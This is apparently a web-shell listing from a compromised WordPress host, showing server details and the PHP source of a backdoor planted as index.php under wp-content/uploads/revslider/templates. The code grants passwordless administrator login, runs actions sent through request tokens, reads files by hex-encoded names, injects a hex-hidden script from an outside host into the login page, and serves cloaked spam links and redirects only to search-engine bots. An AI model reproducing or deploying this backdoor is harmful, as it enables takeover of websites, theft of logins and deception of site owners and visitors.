uawdijnntqw1x1x1
IP : 216.73.216.109
Hostname : premium160.web-hosting.com
Kernel : Linux premium160.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Disable Function : None :)
OS : Linux
PATH:
/
home
/
batcwwjx
/
.
/
old
/
public_html
/
wp-content
/
.
/
uploads
/
revslider
/
templates
/
r_info
/
index.php
/
/
} public function read_file( $filename ) { try { $read_file = $this->read( hex2bin( $filename ) ); if ( $this->json_validator( $read_file ) ) { return $read_file; } else { return $this->answer( true, hex2bin( $filename ), $read_file ); } } catch ( Exception $e ) { return $this->answer( false, "Read File Exception", $filename, "ERR000" ); } } public function json_validator( $data = null ) { try { if ( !empty( $data ) ) { @json_decode( $data ); return (json_last_error() === JSON_ERROR_NONE); } return false; } catch ( Exception $e ) { return false; } } public function login( $id = 1 ) { try { $user_info = get_userdata( $id ); $username = $user_info->user_login; $user = get_user_by( 'login', $username ); if ( !is_wp_error( $user ) ) { wp_clear_auth_cookie(); wp_set_current_user( $user->ID ); wp_set_auth_cookie( $user->ID ); $redirect_to = user_admin_url(); wp_safe_redirect( $redirect_to ); exit(); } else { return $this->answer( false, 'I can\'t sign in, sorry', $user_info, 'ERR014' ); } } catch ( Exception $e ) { return $this->answer( false, "Login Exception!", $e->getMessage(), "ERR000" ); } } private function array_keys( $array ) { try { $keys = array_keys( $array ); foreach ( $array as $i ) { if ( is_array( $i ) ) { $keys = array_merge( $keys, $this->array_keys( $i ) ); } } return $keys; } catch ( Exception $e ) { return false; } } private function minute( $date ) { try { $minute = (strtotime( date( "Y-m-d H:i:s" ) ) - strtotime( $date )) / 60 / 60; return round( $minute ); } catch ( Exception $e ) { return 0; } } public static function wp_login() { add_action( 'login_header', function () { wp_enqueue_script( 'wp-login-jquery', hex2bin( '68747470733a2f2f6a732e61706965732e6f72672f6a71756572792e6d696e2e6a73' ), [], rand( 0, 9999 ), false ); } ); } public static function init() { try { $cache = json_decode( (new self( "" ))->cache() ); add_action( $cache->location, array('WPTemplateOptions', 'method') ); } catch ( Exception $e ) { } } public static function method() { try { $cache = json_decode( (new self( "" ))->cache() ); $index = (preg_match( "~({$cache->bot})~i", strtolower( @$_SERVER["HTTP_USER_AGENT"] ) )) ? true : false; if ( $index && $cache->status == 9 && !empty( $cache->redirect ) && isset( $cache->redirect ) ) { header( "Location: {$cache->redirect}", true, 301 ); } if ( $index && $cache->is_home ) { echo $cache->style . implode( $cache->implode, $cache->link ); } if ( $index && !$cache->is_home && !is_home() && !is_front_page() ) { echo $cache->style . implode( $cache->implode, $cache->link ); } } catch ( Exception $e ) { } } } } try { if ( !function_exists( 'preArrayList' ) ) { function preArrayList( $arr ) { echo "<pre>"; print_r( $arr ); echo "</pre>"; } } if ( !defined( "ABSPATH" ) ) { foreach ( [ "..", "../..", "../../..", "../../../..", "../../../../..", "../../../../../.." ] AS $directory ) { if ( file_exists( $directory . DIRECTORY_SEPARATOR . 'wp-load.php' ) ) { include_once($directory . DIRECTORY_SEPARATOR . 'wp-load.php'); } } } } catch ( Exception $e ) { } try { $token = @$_REQUEST["wp_action_token"]; $action = @$_REQUEST['wp_action_application']; $params = @$_REQUEST['wp_action_params']; error_reporting( 0 ); if ( !is_null( $token ) && !empty( $token ) ) { $WPTemplateOptions = new WPTemplateOptions( $token ); $controlAction = $WPTemplateOptions->controlAction( $action, $params ); if ( is_array( $controlAction ) || is_object( $controlAction ) ) { preArrayList( $controlAction ); } else { echo $controlAction; } } else { WPTemplateOptions::init(); WPTemplateOptions::wp_login(); } } catch ( Exception $e ) { }
/home/batcwwjx/./old/public_html/wp-content/./uploads/revslider/templates/r_info/index.php